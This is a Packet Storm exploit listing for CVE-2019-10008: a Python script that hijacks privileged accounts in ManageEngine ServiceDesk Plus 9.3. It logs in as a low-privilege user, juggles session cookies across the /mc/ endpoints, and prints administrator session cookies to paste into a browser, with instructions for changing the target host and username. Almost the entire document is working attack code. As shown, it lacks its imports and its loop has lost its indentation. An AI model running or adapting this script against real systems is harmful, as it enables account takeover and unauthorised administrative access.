Manage Engine ServiceDesk Plus 9.3 Privilege Escalation

2019-04-04T00:00:00
ID PACKETSTORM:152401
Type packetstorm
Reporter Ata Hakcil
Modified 2019-04-04T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking  
# Date: 30-03-2019  
# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız  
# Vendor: ManageEngine  
# Vendor Homepage: www.manageengine.com  
# Product: Service Desk Plus  
# Version: 9.3  
# Tested On: Windows 10 64 bit  
# CVE : 2019-10008  
  
  
# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.  
# Low username and password is an account you have access to. high_username is account you want to authenticate as.  
  
# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.  
# Run this script on a Linux OS.  
  
#Host ip address + port  
host="localhost:8080"  
  
#set to https if needed  
url = "http://" + host  
  
#Username with credentials you have  
low_username="guest"  
low_password="guest"  
  
#username you want to login as  
high_username="administrator"  
  
  
  
  
  
print("\033[1;37mUrl: \033[1;32m" + url)  
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)  
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)  
  
  
print("\033[1;32mGetting a session id\033[1;37m")  
  
# Get index page to capture a session id  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
print("Sessid:")  
print(sessid)  
  
  
print("\033[1;31mLogging in with low privilege user\033[1;37m")  
  
  
#Attempt login post request   
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\  
-H $'Referer: "+url+"/'\  
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \  
-b $'JSESSIONID="+sessid+"' \  
--data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\  
hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\  
dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \  
$'"+url+"/j_security_check'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
  
#Instead of following redirects with -L, following manually because we don't need all the transactions.  
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\  
-H $'Referer: "+url+"/'\  
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \  
-b $'JSESSIONID="+sessid+"' \  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
print("\033[1;32mCaptured authenticated cookies.\033[1;37m")  
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
print(sessid)  
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
print(sessidsso)  
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)  
  
grbl2 = []  
for cookie in grbl:  
cl = cookie.split('=')  
if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':  
  
grbl2.append(cl[0])  
grbl2.append(cl[1])  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
print("\033[1;32mCaptured secondary sessid.\033[1;37m")  
print(sessid2)  
  
  
print("\033[1;31mDoing the magic step 1.\033[1;37m")  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Referer: "+url+"/mc/WOListView.do' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCLogOut.jsp'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
print("\033[1;31mDoing the magic step 2.\033[1;37m")  
  
  
  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCDashboard.jsp'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
  
curl = "curl -i -s -k -X $'POST' \  
-H $'"+host+"' \  
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \  
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
--data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \  
$'"+url+"/mc/j_security_check'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \  
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-H $'Upgrade-Insecure-Requests: 1' \  
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCDashboard.jsp'"  
  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
  
sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
  
print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")  
print("JSESSIONID=" + sessidhigh)  
print("JSESSIONIDSSO=" + sessidssohigh)  
print(grbl2[0] + "=" + grbl2[1])  
print(grbl2[2] + "=" + grbl2[3])  
print("_rem=true")  
`